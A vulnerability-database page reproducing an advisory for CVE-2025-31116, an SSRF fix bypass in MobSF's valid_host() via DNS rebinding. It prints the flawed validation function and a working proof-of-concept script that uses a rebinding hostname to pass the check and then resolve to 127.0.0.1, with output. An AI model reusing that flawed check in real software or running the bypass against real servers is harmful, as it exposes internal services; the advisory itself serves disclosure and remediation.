4.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-31116

GHSA ID

GHSA-fcfq-m8p6-gw56

EPSS Score

0.23977%

CWE

CWE-918

Published

3/31/2025

Updated

3/31/2025

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-31116

CVE-2025-31116: Mobile Security Framework (MobSF) has a SSRF Vulnerability fix bypass on assetlinks_check with DNS Rebinding

Summary

The latest deployed fix for the SSRF vulnerability is through the use of the call valid_host(). The code available at lines /ae34f7c055aa64fca58e995b70bc7f19da6ca33a/mobsf/MobSF/utils.py#L907-L957 is vulnerable to SSRF abuse using DNS rebinding technique.

PoC

The following proof of concept:

def valid_host(host):
    """Check if host is valid."""
    try:
        prefixs = ('http://', 'https://')
        if not host.startswith(prefixs):
            host = f'http://{host}'
        parsed = urlparse(host)
        domain = parsed.netloc
        path = parsed.path
        if len(domain) == 0:
            # No valid domain
            return False, None
        if len(path) > 0:
            # Only host is allowed
            return False, None
        if ':' in domain:
            # IPv6
            return False, None
        # Local network
        invalid_prefix = (
            '100.64.',
            '127.',
            '192.',
            '198.',
            '10.',
            '172.',
            '169.',
            '0.',
            '203.0.',
            '224.0.',
            '240.0',
            '255.255.',
            'localhost',
            '::1',
            '64::ff9b::',
            '100::',
            '2001::',
            '2002::',
            'fc00::',
            'fe80::',
            'ff00::')
        if domain.startswith(invalid_prefix):
            return False, None
        ip = socket.gethostbyname(domain)
        if ip.startswith(invalid_prefix):
            # Resolve dns to get IP
            return False, None
        return True, ip
    except Exception:
        return False, None

import random
import time
import socket
from urllib.parse import urlparse

if __name__ == '__main__':
    print("Generating random host ...", end=' ')     
    prefix = random.randint(999_999, 9_999_999)
    host = f"{prefix}-make-1.1.1.1-rebindfor30safter1times-127.0.0.1-rr.1u.ms"
    print("Done")
    print(f"Testing with '{host}' ... ", end=" ")
    valid, ip = valid_host(host)
    if valid:
        print(f"Successful Bypass")
        print(f" - Host initially resolved to: {ip}")
        print("Sleeping for 1 second ...")
        time.sleep(1)
        print(f" - Second use host will be resolved to: {socket.gethostbyname(host)}")
        print(f" - Third use host will be resolved to: {socket.gethostbyname(host)}")
        print("Sleeping for 30 seconds ...")
        time.sleep(30)
    else:
        print(f"Invalid host")

Yields :

$ python3 poc.py
Generating random host ... Done
Testing with '5084216-make-1.1.1.1-rebindfor30safter1times-127.0.0.1-rr.1u.ms' ...  Successful Bypass
 - Host initially resolved to: 1.1.1.1
Sleeping for 1 second ...
 - Second use host will be resolved to: 127.0.0.1
 - Third use host will be resolved to: 127.0.0.1
Sleeping for 30 seconds ...

Which generate an initlal random url that leverages dns rebinding after 1 time host resolution and remains to that IP for 30 seconds. As you can notice the initial resolution was pointing to 1.1.1.1. The second time the IP was resolved to 127.0.0.1. Such an attack could be adjusted for other IP addresses.

Impact

The usual impact of Server-side request forgery.

Remediation

Avoid the use of socket.gethostbyname() since it issues and DNS query.

(GitHub Advisory)

4.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-31116

GHSA ID

GHSA-fcfq-m8p6-gw56

EPSS Score

0.23977%

CWE

CWE-918

Published

3/31/2025

Updated

3/31/2025

KEV Status

Technology

Python

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:L

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
mobsf	pip	< 4.3.2	4.3.2

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from the original valid_host implementation in utils.py that used synchronous DNS resolution with gethostbyname(). The security patch moves this function to security.py with improved checks using getaddrinfo and ipaddress validation. The removed code in utils.py shows the vulnerable pattern of single DNS resolution followed by static blocklist checks, which is exploitable through DNS rebinding as demonstrated in the PoC. Runtime detection would see calls to the original utils.valid_host function during SSRF attempts.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry T** l*t*st **ploy** *ix *or t** SSR* vuln*r**ility is t*rou** t** us* o* t** **ll `v*li*_*ost()`. T** *o** *v*il**l* *t lin*s [/****************************************/mo*s*/Mo*S*/utils.py#L***-L***](*ttps://*it*u*.*om/Mo*S*/Mo*il*-S**u

Reasoning

T** vuln*r**ility st*ms *rom t** ori*in*l v*li*_*ost impl*m*nt*tion in utils.py t**t us** syn**ronous *NS r*solution wit* **t*ost*yn*m*(). T** s**urity p*t** mov*s t*is *un*tion to s**urity.py wit* improv** ****ks usin* **t***rin*o *n* ip***r*ss v*li

4.4

Basic Information

Concerned about an active attack path?

CVE-2025-31116: Mobile Security Framework (MobSF) has a SSRF Vulnerability fix bypass on assetlinks_check with DNS Rebinding

Summary

PoC

Impact

Remediation

4.4

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI